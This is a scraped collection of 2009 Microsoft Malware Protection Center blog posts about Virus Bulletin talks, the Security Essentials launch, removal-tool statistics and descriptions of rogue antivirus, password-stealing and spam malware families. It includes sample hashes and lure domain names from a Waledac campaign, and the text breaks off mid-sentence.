Luckily, the weather was perfect the whole time we were there and so the beautiful fountain in Lake Geneva, the Jet d eau, was turned on every day We also saw the flower clock and the old town with its gorgeous architecture Next year, the Virus Bulletin conference will be in Vancouver We're certainly looking forward to it IMAGE IMAGE --Katrin IMAGE http://www.secuobs.com/revue/news/146523.shtmlhttp://www.secuobs.com/revue/news/146523.shtml Secuobs.com : 2009-09-30 00:00:49 - Microsoft Malware Protection Center - The Microsoft Malware Protection Center MMPC would like to introduce you to Microsoft s new security program - Microsoft Security Essentials The MMPC is very excited about this release, which should help us to protect more customers around the world at no cost Here s a note from the Microsoft Security Essentials team Microsoft Security Essentials formerly codenamed Morro is the newest security product from Microsoft that helps protect consumers against viruses, spyware and other malicious software The program, using the same technology as the Forefront product family, is designed to protect and take the guess work out of you wondering if you are protected or not If you re green, you re good Red or yellow means there is something that needs to be done to keep your PC secure A single click and the PC is back to the green protected state Microsoft Security Essentials is also designed to address cost and other barriers that have prevented many of our customers from running up-to-date security protection on their PCs Because there are no subscription fees, there is no registration required to collect billing or other personal information It also runs quietly in the background scheduling scans when the PC is most likely idle and interrupting the user only when there is an action required to keep their PC secure It employs practices like active memory swapping and CPU throttling to limit the impact on your PC performance, even on older or less powerful PCs This isn t a security suite product that provides rich PC tuning capabilities or backs up your data But if what you re looking for is install and forget malware protection and solid quality Microsoft Security Essentials may be just what you ve been waiting for Plus, as a user of Microsoft Security Essentials you ll get support from the MMPC We think you re gonna like what you get with Microsoft Security Essentials See for yourself and download it now Microsoft Security Essentials is available now in 8 languages and 19 markets around the world for genuine Windows PCs Download at http wwwmicrosoftcom security_essentials IMAGE IMAGE http://www.secuobs.com/revue/news/145688.shtmlhttp://www.secuobs.com/revue/news/145688.shtml Secuobs.com : 2009-09-22 05:48:59 - Microsoft Malware Protection Center - Hello Greetings from Dublin As mentioned by Jakub in a previous post, we are presenting at the Virus Bulletin International Conference 2009 in Geneva next week It s an understatement to say that we're excited about attending the conference and not just about presenting our papers, but about getting the chance to meet the other delegates From the technical stream we have Elda and Francis We re presenting our paper entitled Blast from the Past Application of the MS08-067 Exploit in Real World Malware Together with our colleague, Scott Wu from the team in Redmond, we'll talk about the MS08-067 vulnerability and how it was exploited by different malware, including Conficker The presentation explains the Server service vulnerability addressed in the MS08-067 security bulletin and shows how different malware families utilized this exploit We also present some interesting data from the field on the malware families involved We re the first presenters for the technical stream, so we ll see you on Wednesday morning From the corporate stream we have Ina and Marian We are presenting our paper, The Cloud or the Mist Those of you who are Stephen King fans might be familiar with his novella The Mist , in which an evil mist invades a town and wreaks havoc In the same way, cloud technology is a buzzword right now, and some people are hyping it as the next evolution of the Internet Yet there are a lot of valid concerns, especially about privacy and security Our paper talks about the potential security risks of the cloud what dangers exist when we store personal and sometimes highly profitable information in the cloud What social engineering techniques exist that have only emerged with cloud technology And what malware families exploit the cloud to perform their malicious routines We are presenting on Friday right before lunch, but we promise our slides will be just as filling We'd all love to meet those of you who will be attending and especially those of you who are interested in our research See you there Kita kits Filipino Ne vedem acolo Romanian Slán go fóill Gaelic - Elda, Francis, Ina and Marian IMAGE http://www.secuobs.com/revue/news/143033.shtmlhttp://www.secuobs.com/revue/news/143033.shtml Secuobs.com : 2009-09-18 10:44:54 - Microsoft Malware Protection Center - As Jakub mentioned, I'll soon be presenting at the Virus Bulletin conference in Geneva I've spent a lot of time looking at rogue security software in the last year, so I'm looking forward to sharing some of my findings The subject of rogues or scareware is a timely one You may have heard reports in the past few days of a couple of malware attacks which involved rogues One of these was an attack where visitors to the New York Times web site were seeing pop-ups telling them that their computer was infected, then being redirected to a fake online malware scanner There have also been several reports of hackers exploiting the news of Patrick Swayze's death in order to direct people to you guessed it a fake online scanner Not only were both of these attacks distributing rogues, they were both pushing the same rogue We call it Win32 FakeXPA Win32 FakeXPA has been using these distribution methods for a while now The New York Times attack was accomplished through a malicious advertisement these have been used to distribute rogues via legitimate web sites at least since early 2007 The second attack was not an attempt to exploit the death of Patrick Swayze specifically, but rather part of an ongoing campaign that Win32 FakeXPA's distributors have been running to poison results from search engines to lure people to their malicious sites Most popular search terms are exploited in this way, by rogues like Win32 FakeXPA and other types of malware too These are the same techniques that have made Win32 FakeXPA the most prevalent rogue for some time Despite the press, we are not seeing increased activity from Win32 FakeXPA through our telemetry or from our customers I'll be talking about both of these distribution techniques and a lot more about rogues in Geneva I hope to see you there - Hamish O'Dea IMAGE http://www.secuobs.com/revue/news/142139.shtmlhttp://www.secuobs.com/revue/news/142139.shtml Secuobs.com : 2009-09-16 11:27:46 - Microsoft Malware Protection Center - At last year s VB conference, my talk Playing with shadows - exposing the black market for online game password theft discussed malware being sold on the black market for password stealing purposes During the Q A time, someone asked a question regarding the technical details of Dogrobot, a family of malware that can penetrate the protection offered by a hard disk recovery card used to restore a machine to a known, clean state Unfortunately, I don t think I gave a satisfactory answer due to my limited research on it at that time I ve been feeling guilty since then and the experience encouraged me to spend more time studying it After crawling around in file system drivers and Dogrobot drivers for a few months, I finally managed to get a comprehensive understanding of the technical details of this malware Unfortunately, I can t go back to yesterday to answer the question again fortunately, the VB committee gave me a second chance - they accepted my paper entitled 'I can't go back to yesterday, because I was a different person then' which will be presented at VB2009, on 23rd September in Geneva In the presentation, delegates will hear about Malware designed to specifically target the recovery hardware used in Internet Cafés in China - how it works, and why Malware that has caused 8 billon RMB 12 billion USD in losses but doesn t infect files Further details of the black market for malware Are you interested in this See you in Geneva Chun Feng IMAGE http://www.secuobs.com/revue/news/141379.shtmlhttp://www.secuobs.com/revue/news/141379.shtml Secuobs.com : 2009-09-15 07:20:32 - Microsoft Malware Protection Center - Another year has passed, and the time of the most important annual anti-malware event is upon us The Virus Bulletin International Conference 2009 takes place on 23-25 September at The Crowne Plaza Hotel in Geneva, Switzerland As usual, the program is packed to the rafters with malware-related material, with presentations spread across two parallel streams, and three busy days that, no doubt, will be filled with research papers, discussions and heated but friendly arguments A strong contingent from Microsoft is attending, including authors and presenters discussing the results of their latest research The delegates can see the following Microsoft presentations On Wednesday, September 23, a paper titled Blast from the past application of the MS08-067 exploit in real world malware by Elda Dimakiling, Francis Allan Tan Seng and Scott Wu On the same day, and also in the Technical stream, the paper I can't go back to yesterday, because I was a different person then by Chun Feng On Thursday, in the Corporate stream, the paper How to reclaim your sender reputation by Terry Zink from the FOSE team During Friday's proceedings, in the Corporate stream, the paper The cloud or the mist by Marian Radu and Hilda Larina Ragragio On the same day, as the last presentation of the conference, and just before the closing panel discussion, the paper The modern rogue - malware with a face by Hamish O Dea Traditionally, every VB Conference attracts big interest and large crowds, making each event a perfect venue for various industry meetings and it's no different this year - the AVPD and the WildList meetings are already scheduled for the same time, at the same location Jakub Kaminski IMAGE http://www.secuobs.com/revue/news/140868.shtmlhttp://www.secuobs.com/revue/news/140868.shtml Secuobs.com : 2009-09-09 08:26:16 - Microsoft Malware Protection Center - This month we added both Win32 Bredolab and Win32 Daurso families to the latest MSRT release Win32 Bredolab is a trojan downloader that garnered industry attention over the middle stages of 2009 This is due to a number of spam campaigns employing e-mail lures with parcel delivery themes The e-mail messages appear to originate from legitimate sources such as UPS United Parcel Service of America or DHL Dalsey, Hillblom and Lynn However, Win32 Bredolab is a not a new family of malware Its origins date back at least three years, having gone through a number of evolutions during this time Win32 Bredolab has been observed to download malware from a vast array of families This includes families of trojan downloaders, rogues, worms, spam bots, password stealers and just about everything in between From the beginning of 2009, the MMPC has observed variants of Win32 Bredolab downloading malware from over 100 unique families To give you an idea, below is a short list of the more prevalent and well-known families downloaded, many of which are families addressed by MSRT Win32 Alureon Win32 Ambler Win32 Boaxxe Win32 Busky Win32 Cbeplay Win32 Cutwail Win32 Danmec Win32 Daurso Win32 Emold Win32 FakeRean Win32 FakeSpypro Win32 FakeXPA Win32 Harnig Win32 Haxdoor Win32 Hiloti Win32 Koobface Win32 Momibot Win32 Oderoor Win32 Oficla Win32 Otlard Win32 Phdet Win32 Rlsloup Win32 Rugzip Win32 Rustock Win32 Sinowal Win32 Srizbi Win32 Tedroo Win32 Ursnif Win32 Vundo Win32 Waledac Win32 Wantvi Win32 Winwebsec Win32 Wopla Win32 Zbot The 2nd family added to the September release of MSRT is a password stealing trojan known as Win32 Daurso It attempts to steal stored FTP credentials and could be referred to as a sibling of Win32 Bredolab due to some of the code shared by the installation wrapper Additionally, the control server that Win32 Bredolab variants contact is exactly the same as that used by Win32 Daurso Finally, Win32 Daurso is often downloaded by Win32 Bredolab itself Win32 Daurso has the capability to retrieve passwords stored locally by popular 3rd party FTP clients such as CuteFTP , FlashFXP and Core FTP Credentials residing in protected storage are also targeted by Win32 Daurso It may come as no surprise to our readers, however, that we see that user credentials continue to be a valuable commodity for malware authors The value of FTP credentials lies in the likelihood that the compromised account is associated with web hosting capability This could easily be employed for nefarious purposes, either by inserting malicious content or for simple malware hosting purposes, for example Scott Molenkamp IMAGE http://www.secuobs.com/revue/news/139051.shtmlhttp://www.secuobs.com/revue/news/139051.shtml Secuobs.com : 2009-08-28 06:24:39 - Microsoft Malware Protection Center - This month the MMPC added a new threat family, Win32 FakeRean, to the MSRT You can refer to Hamish s blog post, Win32 FakeRean and MSRT for more details on this fake, or rogue, security software As of August 24, the MSRT had cleaned FakeRean from 162,328 infected machines The following table shows data gathered from the MSRT since its August release Family Threat Count Machine Count Taterf 544,662 463,000 Renos 308,789 228,973 Alureon 249,101 211,441 FakeRean 219,359 162,328 Bancos 173,134 158,152 Koobface 274,769 134,139 Frethog 140,218 132,827 Cutwail 166,284 110,840 Rustock 98,673 90,788 Tibs 93,175 84,081 Note the Threat Count total is higher than Machine Count because an infected machine may contain multiple components of a threat Win32 Taterf noticeably still holds first place in the MSRT s top detections This is a family of worms that spread via mapped drives in order to steal login and account details for popular online games Taterf is closely related to Win32 Frethog, another MSRT family added at the same time as Taterf, and also found in the above list We believe that the two are based on the same source code due to the similarities between them Since they were first added, these two families have been ranked near the top and this month is no exception You can revisit a previous blog post about this threat for more in-depth details Another usual suspect is Win32 Renos It was added to the MSRT in May 2007, before rogue software was viewed as being disruptive as they are today Renos holds a high ranking due to it its strong ties with rogues We think this addition was a good investment as many of us have at least once encounterd the dreaded Your computer is infected message A few notes about the remaining threats from the list Win32 Koobface is a prevalent worm that spreads by utilizing social networking sites It s a complex family with multiple components that act as proxies, report affected user's online behavior, generate pay per click advertising revenue, steal data, and even break captchas Win32 Alureon is a family of data-stealing trojans These trojans allow an attacker to intercept incoming and outgoing Internet traffic to gather confidential information such as user names, passwords, and credit card data Win32 Alureon may also allow an attacker to transmit malicious data to the infected computer This family also has rootkit components that provide stealth functionality Win32 Bancos is a family of data-stealing trojans that captures users' online banking credentials such as account login names and passwords These trojans send the captured information to the attacker by e-mail, or by uploading to an attacker's FTP site or posting to an attacker's Web site The following table shows the breakdown by country region US, China, and Brazil report the highest numbers of infected machines during the same time frame as the previous table Country Region Threat Count Machine Count US 8,750,628 2,183,166 China 1,085,140 383,378 Brazil 737,322 282,152 UK 1,078,540 278,207 Korea 601,646 262,539 France 412,115 156,566 Taiwan 236,047 140,283 Spain 328,829 133,264 Canada 433,770 119,885 Mexico 447,841 117,845 The US is at the top of this list as it is by default the top target for most of the malicious code out there China and Brazil are actually a totally different story While China is a top target for online games password stealers and the black market associated with it, Brazil is a prime goal for another breed of password stealers those targeting bank accounts Given these locations, it should come as no surprise that the top prevalent threats are what they are As you look at this table you will see that the number of unique machines infected is lower than the total number of disinfections by MSRT There are several reasons for this including infections of multiple malware families on the same machine some malware downloads other malware , multiple variants of the same family of malware found on the same machine and re-infections of the same machine over time MSRT is not a replacement for antivirus software with real-time protection from a known, trusted vendor When choosing an AV vendor be wary of rogue security software You can find a list of anti-virus products for Windows here We hope this data has been helpful for our readers Marian Radu Scott Wu MMPC Additional resources Latest Microsoft Security Intelligence Report SIR IMAGE http://www.secuobs.com/revue/news/135437.shtmlhttp://www.secuobs.com/revue/news/135437.shtml Secuobs.com : 2009-08-21 12:15:09 - Microsoft Malware Protection Center - In a previous blog, you may have read about rogues using a fake YouTube page to entice users into downloading and installing a rogue security trojan We are now showing you the real deal We discovered a page there are probably more within the real YouTubecom fig 1 website trying to benefit from its user database by redirecting them, by means of social engineering ie viewing an episode of a popular cartoon series to another page fig 2 The malicious page pushes a fake video codec to install a copy of the trojan Win32 Winwebsec Malicious YouTube post Figure 1 - Malicious YouTube post IMAGE Figure 2 - Fake video codec install request Below, you can see a dialogue window that suggest that your computer is vulnerable, unstable and infected, and instructs you to buy the fake rogue security trojan to correct the found yet non-existent malware The UI displays a credible interface with controls commonly found in security applications such as System Scan , Update and Settings After a scan , the rogue will commonly display a list of discovered malware as in the example shown below IMAGE Figure 3 - Winwebsec Fake Detections To compliment the simulated scan, the rogue creates fake error messages as well to provide more convincing evidence that your computer is compromised as in the examples shown below Note the typo in the error message window title bar IMAGE IMAGE Figures 4 5 - WinWebsec generated error messages Of course, after you realize you ve been fooled by the rogue, you will want to uninstall it When you attempt to remove Winwebsec, you ll discover that it doesn t allow you to easily accomplish this and a helpful FAQ provides some insight that you can download another piece of software fig 6 , which could represent another way for attackers to compromise your machine IMAGE Figure 6 - FAQ This file is also detected by our products also as Win32 Winwebsec Be safe Marian Radu, MMPC Dublin PS There is no security issue or vulnerability in YouTubecom This is just a case of a user abusing a free service IMAGE http://www.secuobs.com/revue/news/133094.shtmlhttp://www.secuobs.com/revue/news/133094.shtml Secuobs.com : 2009-08-12 22:43:11 - Microsoft Malware Protection Center - On July 14, the MMPC added another fake security software program rogue , Win32 FakeSpyPro, to the MSRT release As of July 29, MSRT removal on FakeSpyPro has been reported from 187,258 machines worldwide Rogues continues to be disruptive worldwide Three families FakeSpyPro, InternetAntivirus and FakeXPA from the top list in worldwide are rogues Worldwide China Brazil Family Threats Machines Cleaned Family Threats Machines Cleaned Family Threats Machines Cleaned Taterf 460,015 392,821 Ceekat 33,893 32,165 Bancos 73,930 61,646 Renos 320,355 223,417 Frethog 12,429 11,211 Taterf 25,569 23,522 Koobface 370,744 200,364 Lolyda 16,464 10,955 Banker 22,510 19,426 FakeSpypro 187,258 185,229 Hupigon 11,002 10,398 Banload 20,609 16,923 Alureon 166,563 148,945 Parite 15,991 8,296 Frethog 14,721 13,591 Rbot 150,103 143,565 RJump 7,811 4,850 Rbot 11,527 11,067 InternetAntivirus 137,171 134,050 Rbot 4,646 4,522 Cutwail 7,650 4,795 Frethog 137,819 127,570 Corripio 3,039 2,489 Zlob 3,895 3,728 FakeXPA 100,170 95,965 Zuten 2,795 2,439 Virut 5,322 3,689 Zlob 90,981 84,752 Brontok 1,929 1,901 Renos 5,559 3,485 Password stealers in italics Data from emerging countries such as China and Brazil shows different threat landscape, however None of these rogues were seen in the top threats detected list in either China or Brazil Additionally Five of the top threat families in China are online game PWS They are Ceekat, Frethog, Lolyda, Corripio and Zuten Only one of them, Frethog, is in the top detected threats list worldwide This can be explained at a result that massively multiplayer online role-playing game MMORPG are extremely popular in China Three of the top detected families, Bancos, Banker and Banload in Brazil are online banking PWS, none of which are in the most detected threat list worldwide It indicates that criminals continue to see a value and therefore reinvest to target online banking sites in Brazil after they created these PWS more than four years ago Hupigon is very prevalent in China while not seen as much worldwide It is a complicated threat that employs stealth backdoor behavior with keylogger and PWS payloads Taterf and Frethog are the two MMORPG PWS that are prevalent in Brazil and they are also prevalent worldwide Games such as Rainbow Island, Cabal Online, Lineage, MapleStory, Legend of Mir, World Of Warcraft, etc targeted by these threats have a large fan base worldwide, apparently including Brazil Refer to this list to obtain and install a full AV product for your computer to get protected from these PWS threats --Scott Wu IMAGE http://www.secuobs.com/revue/news/130315.shtmlhttp://www.secuobs.com/revue/news/130315.shtml Secuobs.com : 2009-08-12 12:16:14 - Microsoft Malware Protection Center - This month we added another rogue to the MSRT family list - Win32 FakeRean Win32 FakeRean is generally very similar to Win32 InternetAntivirus and Win32 FakeXPA, which we continue to see in large numbers each month Following the fashion, Win32 FakeRean is distributed as several variants, each with a different name and a different skin Its interface is actually rendered from HTML stored inside the fake scanner's executable file Because of this they can often look quite similar Compare the interfaces for Home Antivirus 2010 and PC Antispyware 2010 , for example Win32 FakeRean scanner interface - PC Antispyware 2010 Win32 FakeRean scanner interface - PC Antispyware 2010 Of course, this allows the creators of the malware to produce new variants with different names quite easily Despite this, some elements of the interface are surprisingly static The Protection level , for example, is always displayed as LOW On the other hand, this isn't really surprising once you know that the program reports the same list of infections whether there is any malware on the system or not While fabricated infection reports are not remarkable - indeed they are what defines this class of malware - the way in which Win32 FakeRean generates these reports is particularly unusual It installs a copy of the ClamAV open source anti-virus scan engine along with a signature file specifically produced for the rogue It then creates files with random names in various locations on local drives and uses the ClamAV engine and signatures to detect them The files it creates and reports are harmless junk, not even executable They appear to be filled with essentially random data, but are created in such a way that the rogue's signatures will detect them So the rogue performs a real scan and detects real files that you would not expect to find on your computer, possibly making its claims more plausible Win32 FakeRean is often downloaded by other malware, such as Win32 Renos, but it is also distributed through web sites that look fairly credible at first glance Again, the different variants are often very similar, right down to the testimanials sic IMAGE IMAGE More information on rogues can be found in the latest Security Intelligence Report SIR -- Hamish O'Dea IMAGE http://www.secuobs.com/revue/news/130040.shtmlhttp://www.secuobs.com/revue/news/130040.shtml Secuobs.com : 2009-08-11 05:23:50 - Microsoft Malware Protection Center - On July 14, the MMPC added another fake security software program rogue , Win32 FakeSpyPro, to the MSRT release As of July 29, MSRT removal on FakeSpyPro has been reported from 187,258 machines worldwide Rogues continues to show disruptive worldwide Three families FakeSpyPro, InternetAntivirus and FakeXPA from the top list in worldwide are rogues Worldwide China Brazil Family Threats Machines Cleaned Family Threats Machines Cleaned Family Threats Machines Cleaned Taterf 460,015 392,821 Ceekat 33,893 32,165 Bancos 73,930 61,646 Renos 320,355 223,417 Frethog 12,429 11,211 Taterf 25,569 23,522 Koobface 370,744 200,364 Lolyda 16,464 10,955 Banker 22,510 19,426 FakeSpypro 187,258 185,229 Hupigon 11,002 10,398 Banload 20,609 16,923 Alureon 166,563 148,945 Parite 15,991 8,296 Frethog 14,721 13,591 Rbot 150,103 143,565 RJump 7,811 4,850 Rbot 11,527 11,067 InternetAntivirus 137,171 134,050 Rbot 4,646 4,522 Cutwail 7,650 4,795 Frethog 137,819 127,570 Corripio 3,039 2,489 Zlob 3,895 3,728 FakeXPA 100,170 95,965 Zuten 2,795 2,439 Virut 5,322 3,689 Zlob 90,981 84,752 Brontok 1,929 1,901 Renos 5,559 3,485 PWS in italics Data from emerging countries such as China and Brazil shows different threat landscape, however None of these rouges were seen in the top list in either China or Brazil More specifically, Five of the top threat families in China are online game PWS They are Ceekat, Frethog, Lolyda, Corripio and Zuten Only one of them, Frethog, is in the top list worldwide This can be explained at a result that massively multiplayer online role-playing game MMORPG are extremely popular in China Three of the top threat families, Bancos, Banker and Banload in Brazil are online banking PWS, none of which is in the top list worldwide It indicates the criminals continue to see a value and therefore reinvest to target online banking sites in Brazil after they created these PWS more than four years ago Hupigon is very prevalent in China while not seen as much worldwide It is a complicated threat that employs stealth backdoor behavior with keylogger and PWS payloads Taterf and Frethog are the two MMORPG PWS that are prevalent in Brazil and they are also prevalent worldwide Games such as Rainbow Island Cabal Online, Lineage, MapleStory, Legend of Mir, World Of Warcraft, etc targeted by these threats have large fan base worldwide, apparently including Brazil Refer to this list to obtain and install a full AV product for your computer to get protected from these PWS threats --Scott Wu IMAGE http://www.secuobs.com/revue/news/129642.shtmlhttp://www.secuobs.com/revue/news/129642.shtml Secuobs.com : 2009-07-22 03:55:28 - Microsoft Malware Protection Center - We ve been working hard, have heard your feedback, and are excited to announce V2 of the MMPC Portal This new portal contains several new features including stream-lined sample submission and tracking, which is made possible by creating an MMPC profile When you log in, the information saved in your MMPC profile auto-populates the sample submission form, thereby expediting the submission process You can then monitor the status of your submission online if you are logged in using your MMPC profile while submitting a sample, we will allow you to view details for all samples you have submitted in the past In effect we now have one stop shopping for sample submission and tracking MMPC Portal V2 includes a change log which allows you to see new and updated detections in the most recent definition versions We have also implemented RSS feeds for encyclopedia entries, active malware lists, and the change log to allow you to stay up to date We have stream-lined our UI to improve accessibility to content, extended existing content, and created new content The new content includes a guidance and advice section, improved encyclopedia content organization, expanded glossary, a list of recent research papers, updates on news and events, highlights around awards and certifications, as well as an introduction to our team We re also looking forward to the new security blog aggregator page on the Microsoft web site that will be live tomorrow This new page consolidates the latest blog posts from several teams including the MMPC and our colleagues in the MSRC, and is a great way to keep up to date on the latest security news from Microsoft We hope you enjoy the new portal as much as we do -- Monilee Atkinson IMAGE http://www.secuobs.com/revue/news/123299.shtmlhttp://www.secuobs.com/revue/news/123299.shtml Secuobs.com : 2009-07-17 11:21:47 - Microsoft Malware Protection Center - Users today are offered choices among many security products, any number of which are sufficient, and none perfect Along with these products are myriads of product test results and certifications, all there to help you make a better, more informed decision on which product to use And as product developers, we ll point to the tests and reviews that best represent our product Like this recent report on the just released Microsoft Security Essentials Beta and the most current AV-Comparatives test showing Windows Live OneCare OneCare reaching the vaunted status of Advanced But are the tests doing what they ought to do I would like to take this opportunity to present a case for advancing the methodology of testing security products In all the time that this industry has been in place, product testing has been conducted by way of throwing huge numbers of malware at the product and seeing how well the product can detect that malware Improvement in testing was measured by increasing the number of samples Comprehensiveness was to have millions instead of thousands, and coverage of the many types instead of just lots of malware And only recently, consideration for false positives FPs finally is influencing the interpretation of the test results An example it is this concept of false positives that allowed OneCare to win the latest AV-Comparatives test There were two other comparable products, one scoring a detection rate higher and one the same as OneCare But, because they also were among the highest in FPs over 15 FPs , both fell to Advanced OneCare only had 0-2 false positives, the lowest of all tested products, and the only one in this lowest category Because false positives cause unnecessary upheaval that may result in nonfunctioning machines, and because a high detection rate is often directly correlated with the propensity to FP, we would like to recognize AV-Comparatives, and all the other testers and certifications that do not blindly judge detection capability without consideration for false positives And our hat's off to Virus Bulletin for having had a no-FP requirement for its VB100 Award for the longest time So, the recognition that false positives are an important consideration in the interpretation of test results is now becoming standard What next to make tests more meaningful for the real user As I mentioned before, the standard way of testing is to throw lots and lots of malware at the products and present a detection percentage This is then presented as a measure of the quality of the product But does that really represent quality for the average user The tests do not simulate the likely scenario on our machines at home or at the office So, how is the result then meaningful If a product misses 1pourcents more than another, are those 10,000 samples in a million meaningful to you Maybe it's 10,000 distinct samples of a single server-side polymorphic trojan from one site that your browser happens to warn you not to visit Or, they might be mostly comprised of a set of targeted attacks Important to the targeted entity and the products they use, but for you or me How do we fix this One of the best advances in the security industry in recent years is the ability we have to capture telemetry about the malware cases we encounter The data associated with malware infections enables us to produce the semiannual Security Intelligence Report And selective use of prevalence reports enables us to make decisions each month regarding the best way for the MSRT to protect the eco-system Others in the industry make use of their telemetry to also produce reports, and free tools to clean up the most prevalent malware affecting the eco-system What we need to do is to incorporate this data in the tests To accomplish this, the Microsoft Malware Protection Center that s us , in its arrangements that give other security vendors access to the malware we collect, has started to also provide normalized prevalence data to other security vendors, security industry testers, and the WildList Organization Tony Lee manages our collection of malware and its distribution to our partner security vendors who care to participate in the Microsoft Virus Information Alliance VIA He will contribute the next section of this blog Malware manages to evolve in its ability to distribute, mutate and update itself at an increasingly fast pace we re often talking about hours and days here Malware also targets various sizes and groups of the population These infection characteristics pose challenges to AV product testing, both in the demographic and chronological sense In order to meaningfully reflect a product's ability to protect its users, the testing methodology employed needs to have an up-to-date and accurate view of the threat landscape Through telemetry collected by our various antimalware products, we are able to observe what is statistically significant to reflect the state of threat activities in the wild, in near real time For example, by observing first seen, last seen dates of a threat, and its occurrences during various periods of time, we can assess the age, severity and activity trend at both file and threat levels Recently, I established an experimental program to share this prevalence data with our security partners We have received very positive feedback and suggestions At the core of this program is an automation process that monitors noticeable new threat activities as they are taking place in the field The process then aggregates, analyzes and publishes this data to security partners in an encrypted channel, on a daily basis Recipients of this information can assimilate this data over time and construct a view similar to the example below SHA1 18375FD78CDE1E1B7291FBC37831CB36013895FD MD5 9FFCA5614A1032B0709ECAB67DF10F49 Total Reports 17,052 File Size 96,047 We also share weekly information in a Top 100 list the top 20 in the report generated July 10th are shown here ITW Index is an abstract representation of one element against another it does not represent actual count Rank SHA1 Threat Name ITW Index 1 57fba4d10135c316676b9ad6c0c01c36dc63203a Worm Win32 Koobfacegen D generic 56 2 52c9b8405ba34081e64482cdc843bc4c86201e03 VirTool WinNT Koobfacegen B generic 50 3 0a7499954d78214189824f8c5cda0b8267882921 Worm Win32 Koobfacegen D generic non_writable_container 43 4 8fc4a8c85c97b1094014fab96fc1135e79e6a41a TrojanProxy Win32 Koobfacegen C generic non_writable_container 38 5 7017d9cc703d195240679158e4f4bb229c25db5d Trojan Win32 LiftenA non_writable_container 37 6 93afca82dc4e0e78a61740dd21cfa1e13ef638ab TrojanDownloader Win32 Smallgen B generic non_writable_container 36 7 51dd6f7bea5c1f8bcac756e34da0964af1193a36 Trojan Win32 Matcashgen M generic 34 8 04cb20e91195126351fdd8ec472e663bfed5b452 Backdoor Win32 DelfB non_writable_container 33 9 db9d18d257df0bb2ef894e3c25dbe42fb787ed34 Trojan Win32 Tibsgen lds generic 25 10 85589f11ab008a9954acb9a80d97836d40c8d464 Trojan Win32 Vundogen AN generic 25 11 e28580d1d635e7e4702b5975a00ceb61762d6a11 TrojanDownloader Win32 VBXR 23 12 3ed104ed15396c6a45d12621b577211700193179 PWS Win32 Daursogen A generic non_writable_container 23 13 245bfc230c2f93304dcd741000e4c53197b081cc PWS Win32 Daursogen A generic non_writable_container 22 14 b2268207ea777d07620f983f96f51da34c7bb3bf PWS Win32 Daursogen A generic non_writable_container 22 15 2160b1794492f332ded96514785265ce4d21e8ef Trojan Win32 C2Lopgen B generic 22 16 0890ff9aa1b4330561f53bb11a3fb00446515477 Trojan Win32 Killavgen A generic 19 17 8579da5efc66348179bd9ea9985478887e2a5946 Trojan Win32 ErtforA 17 18 948f6e13e36170a94f32edabb71c1e5b45324724 VirTool Win32 Injectorgen G generic 17 19 a07938f44a443026ace653e8181518910fb3d103 Trojan Win32 Vundogen AN generic 17 20 3ce19165aeb97e92d4e55ba0fbe73c0aeea51d51 VirTool WinNT Koobfacegen B generic 16 We hope that sharing this type of information can help security vendors prioritize resources to combat malicious threats in the wild it is also in our goal to encourage, by example, other security vendors to share data with AV product testers the testers can then analyze and aggregate this data to better assess the relevance of threats and weigh them meaningfully in their tests - Tony The examples above make a very good contrast to a password stealer that I encountered when someone passed me a spam message from within an MMORPG I was playing SHA1 3BC300E799D57601004692D3E1282637535257FA, MD5 A662DF230142E1E10DB4E8A2865E3AB7 I downloaded it and submitted it so our products would be able to protect against it And to this day, there has been no outside telemetry of this piece of malware But from a tester s perspective, my password stealer and each of the above examples shown by Tony are all the same, despite the fact that all of Tony s samples have been noticed on users machines significantly more times So, I would propose this method for a test strategy to get people to start thinking along these lines 1 Test samples are gathered with accompanying telemetry 2 Statistics are then normalized per contributor - so a larger company with more seats does not overwhelm another contributor s normalized telemetry 3 After the application of a function to rate the significance of the individual test samples, samples are granted values 4 Detection of a sample results in points corresponding to that sample s granted value Here is an example Prevalence Sample A 50 Sample B 25 Sample C 15 Sample D 5 Sample E 2 Next 100 samples 3 If a product misses only E, it would have a score of 98 If a product only detects A,B,C,D,E, it would score a 97 If a product only misses A and gets everything else, it would get a 50 I ve simplified the example greatly But you should be able to see basically that the product is being rated for its ability to detect what users are likely to encounter and have encountered The significance is that it is far more important to be protected against sample A because it is so much more prevalent as it alone accounted for half of all infections It will take some time, just as it took some time for most testers to fully recognize that detection scores cannot disregard the accompanying false positives And even if the testers don t fully embrace this type of testing, we hope that we have opened their minds to consider a better representation of their test set to something that would be more meaningful to their constituents, the computer-using public -- Jimmy Kuo and Tony Lee IMAGE http://www.secuobs.com/revue/news/121795.shtmlhttp://www.secuobs.com/revue/news/121795.shtml Secuobs.com : 2009-07-15 06:18:43 - Microsoft Malware Protection Center - The family added to the July MSRT release is Win32 FakeSpypro As is often the case with rogues, they employ the use of multiple names over time The current branding used by Win32 FakeSpypro is Antivirus System PRO with the previous incarnation being Spyware Protect 2009 The user interface IMAGE Typically, Win32 FakeSpypro assaults the user with a barrage of system tray warnings, fake firewall messages and other pop-ups displaying fake warning messages IMAGE IMAGE IMAGE The ultimate goal of course is the part the end user with their money On websites which look like the following, you may purchase a copy of Win32 FakeSpypro for the princely sum of 4995 US IMAGE Win32 FakeSpypro also drops and installs a browser helper object BHO This component is able to redirect queries to internet search engines such as livecom The redirection is performed selectively, such as when a search term like antivirus is used The user will then be presented with a fraudulent warning page in the browser such as the one displayed below IMAGE Win32 FakeSpypro may arrive on a system via different paths For example, It may be dropped by Win32 Preald, downloaded by Win32 Branvine, Win32 Bredolab or even downloaded by prevalent spam bots such as Win32 Waledac and Win32 Cutwail The MMPC has also observed Win32 FakeSpypro being installed via common exploit kits in the wild --Scott Molenkamp IMAGE http://www.secuobs.com/revue/news/120716.shtmlhttp://www.secuobs.com/revue/news/120716.shtml Secuobs.com : 2009-07-07 06:10:31 - Microsoft Malware Protection Center - Since Independence Day just passed, this probably looked appealing forthe Waledac guys to drops us another campaign The Waledac malwarefamily is known for using special and recent events to try to increasetheir chances of infecting computers We’ve blogged about past Waledacspam runs in the past such as during Valentines and the USpresidential elections last year We’ve also seen Waledac takeadvantage of this event to send out another campaignThe “Independence” spammed e-mail looks like this:IMAGEPlease be advised that the actual subject/body of the e-mail may varyas well as the links that you are redirected to But the idea is thesame, to get you to watch the “Independence fireworks”Other websites may include, but not limited to, one of the following:movie4thjulycomvideo4thjulycommoviefireworkscom4thfireworkcomfireholidaycometcWaledac usually uses quite a large list of new domains for eachcampaign so the list is actually largerOnce you pay a visit to the “Independence” website, you’ll be directedto a fake youtube-lookalike webpage Presumably here you are supposedto watch a video with amazing fireworks and some other “goodies”IMAGEActually, what happens here is that you’ll be asked to run someexecutable instead, as you can see in the next picture, which is inthis case 